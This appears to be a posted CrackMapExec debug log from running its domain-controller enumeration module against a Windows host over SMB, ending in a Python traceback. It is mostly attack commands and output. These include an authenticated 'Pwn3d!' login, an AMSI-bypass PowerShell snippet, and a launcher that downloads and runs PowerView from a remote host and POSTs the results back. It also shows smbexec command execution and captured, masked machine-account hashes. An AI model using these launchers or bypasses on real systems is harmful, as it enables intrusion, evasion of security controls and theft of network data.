Created
April 24, 2017 16:13
net_domaincontroller
cme --verbose smb 1.2.3.4 -u someuser -p somepassword -M get_netdomaincontroller | |
DEBUG Passed args: | |
{'content': False, | |
'cred_id': [], | |
'darrell': False, | |
'depth': None, | |
'disks': False, | |
'domain': None, | |
'exclude_dirs': '', | |
'exec_method': None, | |
'execute': None, | |
'fail_limit': None, | |
'force_ps32': False, | |
'gen_relay_list': None, | |
'gfail_limit': None, | |
'groups': None, | |
'hash': [], | |
'jitter': None, | |
'list_modules': False, | |
'local_auth': False, | |
'local_groups': None, | |
'loggedon_users': False, | |
'lsa': False, | |
'module': 'get_netdomaincontroller', | |
'module_options': [], | |
'no_output': False, | |
'ntds': None, | |
'only_files': False, | |
'pass_pol': False, | |
'password': ['somepassword'], | |
'pattern': None, | |
'protocol': 'smb', | |
'ps_execute': None, | |
'regex': None, | |
'rid_brute': None, | |
'sam': False, | |
'server': 'https', | |
'server_host': '0.0.0.0', | |
'server_port': None, | |
'sessions': False, | |
'share': 'C$', | |
'shares': False, | |
'show_module_options': False, | |
'smb_port': 445, | |
'spider': None, | |
'spider_folder': '.', | |
'target': ['1.2.3.4'], | |
'threads': 100, | |
'timeout': None, | |
'ufail_limit': None, | |
'username': ['someuser'], | |
'users': None, | |
'verbose': True, | |
'wmi': None, | |
'wmi_namespace': 'root\\cimv2'} | |
DEBUG CME server type: https | |
SMB 1.2.3.4 445 TARGET-HOST [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:TARGET-HOST) (domain:TARGET-DOMAIN) (signing:False) | |
DEBUG add_credential(credtype=plaintext, domain=TARGET-DOMAIN, username=someuser, password=somepassword, groupid=None, pillaged_from=None) => None | |
SMB 1.2.3.4 445 TARGET-HOST [+] TARGET-DOMAIN\someuser:somepassword (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://1.2.3.5:443/PowerView.ps1') | |
$cmd = Get-NetDomainController | select Name,Domain,IPAddress | Out-String | |
$request = [System.Net.WebRequest]::Create('https://1.2.3.5:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://1.2.3.5:443/PowerView.ps1') | |
$cmd = Get-NetDomainController | select Name,Domain,IPAddress | Out-String | |
$request = [System.Net.WebRequest]::Create('https://1.2.3.5:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Starting SMB server | |
DEBUG Config file parsed | |
DEBUG Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 | |
DEBUG Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 | |
DEBUG Config file parsed | |
DEBUG Config file parsed | |
DEBUG Config file parsed | |
DEBUG StringBinding ncacn_np:1.2.3.4[\pipe\svcctl] | |
DEBUG Executed command via smbexec | |
DEBUG Hosting batch file with command: %COMSPEC% /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
DEBUG Command to execute: %COMSPEC% /Q /c \\1.2.3.5\FKFCL\EDSUpQ.bat | |
DEBUG Incoming connection (1.2.3.4,59101) | |
DEBUG AUTHENTICATE_MESSAGE (TARGET-DOMAIN\TARGET-HOST$,TARGET-HOST) | |
DEBUG User TARGET-HOST$\TARGET-HOST authenticated successfully | |
DEBUG TARGET-HOST$::TARGET-DOMAIN:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
GET_NETD... 1.2.3.4 [*] - - "GET /PowerView.ps1 HTTP/1.1" 200 - | |
DEBUG Disconnecting Share(1:IPC$) | |
DEBUG Disconnecting Share(2:FKFCL) | |
GET_NETD... 1.2.3.4 [*] - - "POST / HTTP/1.1" 200 - | |
GET_NETD... 1.2.3.4 Hostname: DC01 Domain: TARGET-DOMAINRC IP: 192.168.0.9 | |
GET_NETD... 1.2.3.4 Hostname: DC02 Domain: TARGET-DOMAINRC IP: 192.168.0.10 | |
---------------------------------------- | |
Exception happened during processing of request from ('1.2.3.4', 59108) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/get_netdomaincontroller.py", line 72, in on_response | |
hostname, domain, ip = filter(None, line.strip().split(' ')) | |
ValueError: need more than 2 values to unpack | |
---------------------------------------- | |
DEBUG AUTHENTICATE_MESSAGE (TARGET-DOMAIN\TARGET-HOST$,TARGET-HOST) | |
DEBUG User TARGET-HOST$\TARGET-HOST authenticated successfully | |
DEBUG TARGET-HOST$::TARGET-DOMAIN:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
GET_NETD... 1.2.3.4 445 TARGET-HOST [+] Executed launcher |